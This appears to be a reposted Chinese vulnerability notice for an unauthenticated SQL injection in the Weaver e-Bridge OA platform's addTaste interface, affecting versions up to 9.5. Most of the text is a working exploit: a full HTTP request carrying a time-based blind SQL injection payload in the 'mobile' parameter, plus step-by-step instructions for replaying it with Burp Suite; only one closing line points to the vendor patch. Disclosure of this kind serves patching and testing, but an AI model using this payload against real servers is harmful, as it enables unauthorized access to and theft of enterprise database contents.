微信公众号:不秃头的安全
漏洞详情:
泛微云桥e-Bridge OA是一种基于云计算和移动互联网技术的企业办公自动化(OA)解决方案。它由中国的企业软件开发公司泛微软件开发,旨在帮助企业实现高效的办公管理和协同工作。由于泛微云桥e-Bridge平台addTaste接口存在SQL注入漏洞,未经身份认证的攻击者可以利用该漏洞获取数据库权限及数据库的敏感数据。
影响范围
泛微云桥 e-Bridge <= v9.5
漏洞利用
GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%%20FROM%20(SELECT(SLEEP(9-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: */* Cookie:EBRIDGE_JSESSIONID=CAE1276AE2279FD98B96C54DE624CD18;slsession=BmCjG8ZweGWzoSGpQ1QgQg==;EBRIDGE_JSESSIONID=21D2DAD7941D060B411FABDC10 Accept-Encoding: gzip SL-CE-SUID: 25
讯享网
使用方法:1、打开泛微云桥e-Bridge登录首页,使用BurpSuite拦截请求包
2、将抓到的请求包进行修改,将GET内容修改为POC的GET:/taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%%20FROM%20(SELECT(SLEEP(9-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
3、其他内容不修改,然后放包后即可复现。漏洞修复建议目前官方已发布安全更新,受影响用户可通过官网安装补丁更新。官方下载地址:https://www.weaver.com.cn/subpage/aboutus/news/news-detail.html?id=934

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容,请联系我们,一经查实,本站将立刻删除。
如需转载请保留出处:https://51itzy.com/kjqy/29852.html